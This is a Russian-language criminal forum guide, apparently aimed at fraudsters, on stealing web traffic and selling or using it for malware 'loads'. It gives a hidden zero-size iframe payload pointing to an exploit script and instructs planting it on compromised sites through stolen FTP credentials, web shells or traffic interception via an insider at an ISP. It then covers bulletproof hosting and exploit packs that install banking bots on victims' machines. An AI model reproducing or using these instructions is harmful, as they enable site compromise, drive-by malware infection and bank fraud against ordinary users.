В своей основе iFrame трафик реальные дроповоды используют в своих схемах для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.
Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок…
Чтобы иметь трафик дроповодам darkmoney нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме — это самый надёжный вариант.
Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame — это код HTML внутри страницы. С помощью iFrame дроповод darkmoney может вставлять один HTML документ в другой! Проще говоря, iFrame — это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.
Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:
<iframe src=»http://site.ru/sploit.php» width=»0″ height=»0″ frameborder=»0″></iframe>
где:
http://site.ru/sploit.php — это сайт на который пользователи site.ru будут заходить одновременно
width=»0″ длина равна 0
height=»0″ высота равна 0
frameborder=»0″ граница фрейма равна 0
Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.
Что нужно для продажи трафика?
Есть такая штука, как TDS — Traffic Direct System, — это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.
Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.
В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.
Что же такое эти загрузки?
Загрузки — это загрузка и запуск файла на компьютере клиента банка или простого лоха, — один из самых распространённых методов распространения банковских ботов в сети Интернет.
Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов…
Загрузки — это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.
Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.
Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.
Теперь про связку сплоитов
Exploit — это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.
Что же такое пробив связки?
Пробив — это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился — тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.
Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php — значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.
